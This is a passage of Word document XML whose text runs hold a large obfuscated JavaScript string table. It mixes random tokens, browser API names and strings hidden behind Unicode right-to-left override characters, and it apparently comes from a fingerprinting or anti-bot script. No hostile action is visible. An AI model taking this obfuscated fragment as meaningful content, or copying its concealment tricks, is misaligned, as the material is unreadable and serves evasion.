      <w:r>
        <w:t>", "abs", "LlapLcJHVJ4", "b5tYwCKY02yp", "-2\u202EYuuMIdcQn\u202D", "kTTwJIsjFM1BQN3SvV8x3ZEzW2VC9g", "children", "NcYMjG_z7Db-zzBMKNI", "function", "zpE_n1Lj-gbapRI", "O2jeQqpFF_gxLaU", "U8MfsWXI8iWXiAM-Q-XLSzE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QFi-NdhjDg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XtdalXyujU_S_WIeIK-LdRz68Y7vTeZ53w", "8CSDbPptaacjeaL2", "haIY4VnkwjqI5AQzBtKFEkfi", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GVyTGg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6TzFK6c6bfctcqq5yEkPrMlzVxBZ-zn_Xcbk2klXu2TNxVlLBgVSUb5J1xP5jM3qQ0r0WC2dBtq1KsHEeqIgHw", "match", "C6Ur43rm3x3Zzlc", "2cB87miNhgI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "E61hywjqlA", "PGDNZ5kZB9x-cd7B3wM", "interactive", "y-5C10uBjhfKlnQ", "qbo51XzQ7g", "min", "-5gc1WfC13uprj5JDbmI", "SapNkz-f726EjWA4HuHZ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "any", "bst0jze6qXak", "detail", "sJxGyV-Jrln7xRZrTIk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TGc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ltltkQ-Hv0XJvUtSfw", "ga003CvjqGvbtxhCRfymCGk", "f_cbvHb23A", "PXKyBN04FpxiMM_k2xVm_Lo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQbKHoYdVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "34teyWz0zAncqDI-R4nPMQ", "-2HzdoQ3Rto", "18h2ggX1hQ", "l3Q", "pEv2LuA", "hidden", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "lc4PomaMvQLRkWl1YabaTQ2V", "Cc9MkDePkCDp-Hsa", "JmGAKOt8HahlOPXc", "51v1cdk4IqtFDcmJvjQ4gLxSfHVt6U6QG9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", "CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", "Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-Ty0hjXvKwEV7XsLeLP5pdyn4", "dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%", "Float64Array", "2Ngz8lLmwiz5gmI", "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", "UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "crypto","FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
